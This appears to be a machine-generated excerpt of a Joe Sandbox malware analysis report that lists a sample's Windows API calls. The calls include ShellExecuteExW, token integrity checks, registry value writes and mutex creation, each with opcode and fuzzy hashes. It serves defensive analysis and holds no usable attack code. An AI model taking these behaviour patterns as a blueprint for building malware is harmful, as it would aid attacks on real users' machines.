                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: HeapQueryValue$CloseCreateOpenProcess
                                                                • String ID:
                                                                • API String ID: 3348224683-0
                                                                • Opcode ID: 94e6482191003d89aedc771088591486fa4565b93a4e2d2964c12762c6913e75
                                                                • Instruction ID: a8ec520563b79544d3adaa59eb19770aa98d1824c1b5b360f24ca2357033d8ff
                                                                • Opcode Fuzzy Hash: 94e6482191003d89aedc771088591486fa4565b93a4e2d2964c12762c6913e75
                                                                • Instruction Fuzzy Hash: 8201803210114EFF9F119F95EC84DAFBB6DEF14799B144029F904A6020D7328D30EBA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 400 273e42-273ece call 274e03 * 2 GetForegroundWindow 405 273ecf-273edb ShellExecuteExW 400->405 405->405 406 273edd-273ee0 405->406
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00273E98
                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00273ED3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteForegroundShellWindow
                                                                • String ID: <
                                                                • API String ID: 2707725784-4251816714
                                                                • Opcode ID: 0fe0aaaa20e937d63e02590598d5b11a4f9c5140f4893634598bf75833b27c25
                                                                • Instruction ID: c3f077eb5e279794b4e9056d412410cb4873a7c3aa087bcd97ccbbb30dd8f04d
                                                                • Opcode Fuzzy Hash: 0fe0aaaa20e937d63e02590598d5b11a4f9c5140f4893634598bf75833b27c25
                                                                • Instruction Fuzzy Hash: FC11E3B1D61228ABDB01DFA4E945ADEBBBCAF08B00F10815BF814F2280E7B046008FD1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 407 2760be-2760d8 call 274634 410 276102-276104 407->410 411 2760da-2760ea CreateThread 407->411 414 276105-276109 410->414 412 2760ec-276100 call 273db7 call 274634 411->412 413 27610a-27610c 411->413 412->410 412->411 413->414
                                                                APIs
                                                                  • Part of subcall function 00274634: GetSystemInfo.KERNEL32(?,v,',?,?,00272BD7,?,00000000,00000000,00272C76,00000000), ref: 0027463E
                                                                • CreateThread.KERNEL32(00000000,00000000,00000000,v,',00000000,00000000), ref: 002760E2
                                                                  • Part of subcall function 00273DB7: FindCloseChangeNotification.KERNEL32(00000000), ref: 00273DC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ChangeCloseCreateFindInfoNotificationSystemThread
                                                                • String ID: v,'$v,'
                                                                • API String ID: 908986755-4065132152
                                                                • Opcode ID: 0baeeea30bfb5d268ee4b1bcb09ad36b9c7af76fb98d0cadc305563b0cb235c8
                                                                • Instruction ID: e6c751c0b6655879d4d3e687fbcc2f4a9d6fa536575eddcf410858f3809c151e
                                                                • Opcode Fuzzy Hash: 0baeeea30bfb5d268ee4b1bcb09ad36b9c7af76fb98d0cadc305563b0cb235c8
                                                                • Instruction Fuzzy Hash: 05F0A0726206496E9B102E76AC8C97BB79CDE453BD350C43AF52EC2612DA30DC605A70
                                                                APIs
                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00274134
                                                                • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 0027414D
                                                                • IsValidSid.ADVAPI32(?,00000000), ref: 0027415C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Token$InformationOpenProcessValid
                                                                • String ID:
                                                                • API String ID: 1215394654-0
                                                                • Opcode ID: ad1141dafb9dc57ce4ab5365a8c5e1104c3461259bace1db53530bf741baa577
                                                                • Instruction ID: 3a06ae7e6337e914b2fd9d6e8df3b9f3c9981f90bc416644ec2adab0716cbe2a
                                                                • Opcode Fuzzy Hash: ad1141dafb9dc57ce4ab5365a8c5e1104c3461259bace1db53530bf741baa577
                                                                • Instruction Fuzzy Hash: CFF0C275600108ABDB20EFA5AC09EEF7BBDEF44710F548055F909D6050DB34DE14DBA1
                                                                APIs
                                                                • RegCreateKeyExW.KERNEL32(00000000,0028D640,00000000,00000000,00000000,00000002,00000000,00271820,00000000,00000000,?,?,002724BC,80000002,?,?), ref: 00274864
                                                                • RegSetValueExW.KERNEL32(00271820,?,00000000,00000000,0028D698,?,?,?,002724BC,80000002,?,?,00000003,0028D600,?,0028D698), ref: 0027487E
                                                                • RegCloseKey.KERNEL32(00271820,?,?,002724BC,80000002,?,?,00000003,0028D600,?,0028D698,00000000,?,0028D640,00000000,00271820), ref: 0027488F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 1818849710-0
                                                                • Opcode ID: 39fe5e1c8f7ef9845c2d3853a619d035945174552f7e0f0f9779752607df874b
                                                                • Instruction ID: ca97cc8af1d764bf46b085d1f0d91968e236388526c916229e72275142921c13
                                                                • Opcode Fuzzy Hash: 39fe5e1c8f7ef9845c2d3853a619d035945174552f7e0f0f9779752607df874b
                                                                • Instruction Fuzzy Hash: 9DF0FE3650222DBBCF255F91EC0DDDB7F6DEF0A6A1B104165FE0995020D7328920EBE0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: <
                                                                • API String ID: 0-4251816714
                                                                • Opcode ID: 8ecbbf85ed07150e1ef2514a4f771ec13d396edf2ab0e29ed0d5bff461973686
                                                                • Instruction ID: bcc4a64a8a8f926d5aabec8210422551049fc40cc5b80bc70bad429e377d408b
                                                                • Opcode Fuzzy Hash: 8ecbbf85ed07150e1ef2514a4f771ec13d396edf2ab0e29ed0d5bff461973686
                                                                • Instruction Fuzzy Hash: 55617EB5911219AFDB11DFA5EC49EEF7FB8FF09750F208026F509E6290D77489508BA0
                                                                APIs
                                                                  • Part of subcall function 0027627F: WriteFile.KERNEL32(?,?,,',00000000,?,?,00272D7C,?,?,?,?,?,?,?,?,?), ref: 00276291
                                                                • RtlGetLastWin32Error.NTDLL ref: 00272D81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLastWin32Write
                                                                • String ID: ,'
                                                                • API String ID: 2457671358-2013940313
                                                                • Opcode ID: 85d19d00b28ca39dcca42f6558273d1f42059d2accb0ba37804b69ab4b354e80
                                                                • Instruction ID: 9c7a98b8862a469dc16f74908b64e68676d8bf3e4ed653fb8cb560375a9358ac
                                                                • Opcode Fuzzy Hash: 85d19d00b28ca39dcca42f6558273d1f42059d2accb0ba37804b69ab4b354e80
                                                                • Instruction Fuzzy Hash: F5F0C872410619BBCB607E95CC0ADDB377CDF96710F00C005FE1C86101D63095248BA1
                                                                APIs
                                                                  • Part of subcall function 00273BDD: HeapCreate.KERNEL32(00000000,00000000,00000000,?,0027611A,00000000,00000000,?,00272BD7,?,00000000,00000000), ref: 00273BF2
                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,00272BD7,?,00000000,00000000,00272C76,00000000), ref: 00276131
                                                                  • Part of subcall function 002760BE: CreateThread.KERNEL32(00000000,00000000,00000000,v,',00000000,00000000), ref: 002760E2
                                                                  • Part of subcall function 00273BFA: HeapDestroy.KERNELBASE(?,?,00275426,?,?,0028D75C,00000000,00000000,?,002713EC,0028D738,?,00000000), ref: 00273C00
                                                                  • Part of subcall function 00273DB7: FindCloseChangeNotification.KERNEL32(00000000), ref: 00273DC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$Heap$ChangeCloseCompletionDestroyFindNotificationPortThread
                                                                • String ID: v,'
                                                                • API String ID: 1739922738-856036149
                                                                • Opcode ID: 12ed7c142092a9fd0a248b12c4e4eba571e2d7d2e7983c3978816d52dd6ec55a
                                                                • Instruction ID: 22a181fce4bec44301bb76e45ac1c48066faabd3c7a161a6167b1487392ddbd5
                                                                • Opcode Fuzzy Hash: 12ed7c142092a9fd0a248b12c4e4eba571e2d7d2e7983c3978816d52dd6ec55a
                                                                • Instruction Fuzzy Hash: 0BF0C236134A07AADB216F24EC09A5B3B94AF01364B608428F86DD1692EB31D530AE00
                                                                APIs
                                                                  • Part of subcall function 00274634: GetSystemInfo.KERNEL32(?,v,',?,?,00272BD7,?,00000000,00000000,00272C76,00000000), ref: 0027463E
                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,00272C6C,?,0028D490,?,?,?,00000000), ref: 00276087
                                                                  • Part of subcall function 00274954: Sleep.KERNEL32(?,?,002760A2,00000064,00000000,00000000,?,?,00272C6C,?,0028D490,?,?,?,00000000), ref: 0027495A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CompletionInfoPostQueuedSleepStatusSystem
                                                                • String ID: l,'
                                                                • API String ID: 883128096-582432147
                                                                • Opcode ID: 5a6fdc4a51b2d31034979035fc6eb51f56144b9d0d99003842d9d09bdc0812a9
                                                                • Instruction ID: 1756e27dc3301c608a80cbfda6703521ef7e29282cc0354351bf9a34535a9e53
                                                                • Opcode Fuzzy Hash: 5a6fdc4a51b2d31034979035fc6eb51f56144b9d0d99003842d9d09bdc0812a9
                                                                • Instruction Fuzzy Hash: 85F0B472124705AEEB147F24EC86A5BB79DFF007B8B208029F52D86091DF32AC609A20
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,c)',48000000,00000000,00000000,?,00272963,00000000,?,00000003,00000000,C0000000,00000000), ref: 0027620C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: c)'
                                                                • API String ID: 823142352-1419544299
                                                                • Opcode ID: 2137217c9b24c6c2161bd640538c366914d45462ef35cbc885c9597e6ed6b26c
                                                                • Instruction ID: acdd32c6f1fe29de74b5a14703c332dfb6261e2fd42aaab248731ea8e2a46869
                                                                • Opcode Fuzzy Hash: 2137217c9b24c6c2161bd640538c366914d45462ef35cbc885c9597e6ed6b26c
                                                                • Instruction Fuzzy Hash: A6014475420B05AFDB20DF35EC048A67BE5FF19324B208A29FC59C2A51E331E9209F50
                                                                APIs
                                                                  • Part of subcall function 0027624B: ReadFile.KERNEL32(?,?,,',00000000,?,?,00272B5E,?,?,?,?,?,?,00272CEC,?,?), ref: 0027625D
                                                                • RtlGetLastWin32Error.NTDLL ref: 00272B63
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLastReadWin32
                                                                • String ID: ,'
                                                                • API String ID: 3522703849-2013940313
                                                                • Opcode ID: b172c7d70e383c0cc306bba2d1b6efc2507cfc2694bc5c717a36c466fe8d5d14
                                                                • Instruction ID: fe375efc0932cfb1d4d3ae95d35f7c390ee309cb6ce2027207a86ea9901c83df
                                                                • Opcode Fuzzy Hash: b172c7d70e383c0cc306bba2d1b6efc2507cfc2694bc5c717a36c466fe8d5d14
                                                                • Instruction Fuzzy Hash: ACF0BB31020711E7DB213EA58C46EDB3B9CDF85314F148419FD5C95141D63165384EE2
                                                                APIs
                                                                • WriteFile.KERNEL32(?,?,,',00000000,?,?,00272D7C,?,?,?,?,?,?,?,?,?), ref: 00276291
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID: ,'
                                                                • API String ID: 3934441357-2013940313
                                                                • Opcode ID: 1f148dbd788ee5b8e6b3ecc367cdeea18cf9f39b52592e4c290951c21710ac61
                                                                • Instruction ID: 5851ab63ae4a7a1eead776edc26b4d53e99e09b513331f0c3cb039a430e805a3
                                                                • Opcode Fuzzy Hash: 1f148dbd788ee5b8e6b3ecc367cdeea18cf9f39b52592e4c290951c21710ac61
                                                                • Instruction Fuzzy Hash: C1C00236140208FFDF015F84ED0AEAA3B69EB08655F104051BA184A161C772E9209B65
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,,',00000000,?,?,00272B5E,?,?,?,?,?,?,00272CEC,?,?), ref: 0027625D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID: ,'
                                                                • API String ID: 2738559852-2013940313
                                                                • Opcode ID: 98806dc492f16973a1db0e08f84b82ee40d54eee4a22388a1774395bdc5a3cda
                                                                • Instruction ID: 54a1515837089fccb9c49575fe79553f98f7f68f670fef6a08658eebd89dd4fc
                                                                • Opcode Fuzzy Hash: 98806dc492f16973a1db0e08f84b82ee40d54eee4a22388a1774395bdc5a3cda
                                                                • Instruction Fuzzy Hash: E1C00276140208BFDF015F94EC0AEAA3BA9EB08615F144051BA184A561C772E9609B65
                                                                APIs
                                                                • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 002748CB
                                                                • RtlGetLastWin32Error.NTDLL ref: 002748DA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorLastMutexWin32
                                                                • String ID:
                                                                • API String ID: 682235734-0
                                                                • Opcode ID: 898da4e7bf052d8227e8a0eb3e14159768929b39a817556e62539ee64c0b6664
                                                                • Instruction ID: 9c6e13b315d992a560890ac9d4a860485db0b0984533d202cc545e8d25f9d8ec
                                                                • Opcode Fuzzy Hash: 898da4e7bf052d8227e8a0eb3e14159768929b39a817556e62539ee64c0b6664
                                                                • Instruction Fuzzy Hash: 29F0EC7591125967D7107BE9AC06A9F776CDF00711F104022FD0DD2184E770991487E2
                                                                APIs
                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,00274BA2,00000000), ref: 0027402D
                                                                • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),00000000,00000004,?), ref: 00274046
                                                                  • Part of subcall function 00273DB7: FindCloseChangeNotification.KERNEL32(00000000), ref: 00273DC3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Token$ChangeCloseFindInformationNotificationOpenProcess
                                                                • String ID:
                                                                • API String ID: 3152771255-0
                                                                • Opcode ID: 8be145b75677a3719f25276d97fa8cd22f6e8bf0d845f3ed64f0402d64be8fac
                                                                • Instruction ID: 18773e726ea2ead651fec4a401a7864d038adb42a2333b7f7da71fffbac15528
                                                                • Opcode Fuzzy Hash: 8be145b75677a3719f25276d97fa8cd22f6e8bf0d845f3ed64f0402d64be8fac
                                                                • Instruction Fuzzy Hash: 1CF0F87595010CBBDB00EEE4ED06FEDBBB8EB04701F5080A5BA04E2090D7709B58AB91
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001,002736ED,00000000), ref: 002736A4
                                                                  • Part of subcall function 0027489C: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 002748CB
                                                                  • Part of subcall function 0027489C: RtlGetLastWin32Error.NTDLL ref: 002748DA
                                                                • GetCurrentProcessId.KERNEL32 ref: 002736C6
                                                                  • Part of subcall function 00273EEF: ExitProcess.KERNEL32 ref: 00273EF5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorProcess$CreateCurrentExitLastModeMutexWin32
                                                                • String ID:
                                                                • API String ID: 4743098-0
                                                                • Opcode ID: 3810e55443a70020a9cbbeb3aa5fd04ad4148cc3de832be72811a11b0bf516e2
                                                                • Instruction ID: 244bf9efa359c04031260d4e0da72551629f1aceaabb52bed88b4313ba126771
                                                                • Opcode Fuzzy Hash: 3810e55443a70020a9cbbeb3aa5fd04ad4148cc3de832be72811a11b0bf516e2
                                                                • Instruction Fuzzy Hash: 28D01721676A4266DB64FBB65D0BB1E048C0F00741F10C025B90DA4483DF71C5306D3B
                                                                APIs
                                                                  • Part of subcall function 002747CE: RegOpenKeyExW.KERNEL32(0000000A,00000005,00000000,00000001,?,0028C040,00000000,?,?,002722A9,80000002,?,?,?,?,0028C040), ref: 002747E5
                                                                  • Part of subcall function 002747CE: RegQueryValueExW.KERNEL32(?,000003A9,00000000,0028C040,00000000,?,80000002,?,?,002722A9,80000002,?,?,?,?,0028C040), ref: 002747FF
                                                                  • Part of subcall function 002747CE: RegQueryValueExW.KERNEL32(?,000003A9,00000000,0028C040,00000000,?,?,?,002722A9,80000002,?,?,?,?,0028C040,000003A9), ref: 00274827
                                                                  • Part of subcall function 002747CE: RegCloseKey.KERNEL32(?,?,?,002722A9,80000002,?,?,?,?,0028C040,000003A9,00000005,0000000A,?), ref: 0027483D
                                                                • _snwprintf.NTDLL ref: 00271DE1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: QueryValue$CloseOpen_snwprintf
                                                                • String ID:
                                                                • API String ID: 775465768-0
                                                                • Opcode ID: 074ea7baa315937fdd0ed04a2045fe966d052ec94a015e682e30bd7881c4d02d
